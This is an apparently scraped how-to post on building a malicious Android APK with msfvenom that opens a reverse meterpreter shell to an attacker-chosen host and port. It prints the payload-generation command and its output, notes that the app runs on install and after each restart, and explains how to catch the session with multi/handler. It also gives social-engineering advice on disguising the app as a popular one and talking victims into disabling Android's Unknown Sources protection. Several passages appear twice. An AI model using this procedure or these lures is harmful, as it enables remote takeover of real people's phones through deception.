Tweet
In this small How-to I will show the steps needed to create an Android APK application containing a reverse meterpreter payload. It is actually quite easy and the hard part will be to make the victim install the application. Metasploit already has the capability to generate APK packages so the only task for you to do is to generate the payload using the msfvenom tool that comes with the Metasploit framework. In this example, most options are left at their default values which makes msfvenom autodetect and choose the correct options automatically.
The only options that are required for you to select are
In this example the chosen options are as following
The next thing to do is to execute the msfvenom command with the options we selected for the APK application.
The fun.apk file has now been generated and is a valid Android application called "MainActivity", just in case you want to remove it after testing. The application will run by itself when the application has been installed, and when ever the device is restarted. The rest is up to the end user.
The hard part from here on is to make a user install the application and of course social engineering comes to mind. The easiest way may be to create a professional looking website and place the application on that website, available for download. The application should represent something irresistible or at least something the user want. A possibility is to present the application as an already existing application that is very popular. By default Android devices will not allow installation of applications from Unknown Sources outside Google Play and the trick is to make the user disable this security feature. As with most things related to social engineering, trust is the key. If the website actually contains instructions on how to disable this feature the user may think that, if there is a guide or instructions on how to do it, it must be safe to do. This is called Sideloading; to install Android applications from a source not being Google Play.
To receive the reverse meterpreter session you have to start the multi/handler in a Metasploit console and wait for the Android device to spawn a session.
The only options that are required for you to select are
- The payload
- The LHOST option that defines the public IP address the meterpreter will connect to.
- The LPORT option that defines the port number for the meterpreter to connect to.
- The name of the APK file.
In this example the chosen options are as following
- Payload: "android/meterpreter/reverse_tcp"
- lhost=10.0.0.2
- lport=4444
- Output file: "/root/fun.apk"
The next thing to do is to execute the msfvenom command with the options we selected for the APK application.
[email protected]:~/temp# msfvenom -p android/meterpreter/reverse_tcp lhost=10.0.0.2 lport=4444 -o /root/fun.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8775 bytes
Saved as: /root/fun.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8775 bytes
Saved as: /root/fun.apk
The hard part from here on is to make a user install the application and of course social engineering comes to mind. The easiest way may be to create a professional looking website and place the application on that website, available for download. The application should represent something irresistible or at least something the user want. A possibility is to present the application as an already existing application that is very popular. By default Android devices will not allow installation of applications from Unknown Sources outside Google Play and the trick is to make the user disable this security feature. As with most things related to social engineering, trust is the key. If the website actually contains instructions on how to disable this feature the user may think that, if there is a guide or instructions on how to do it, it must be safe to do. This is called Sideloading; to install Android applications from a source not being Google Play.
To receive the reverse meterpreter session you have to start the multi/handler in a Metasploit console and wait for the Android device to spawn a session.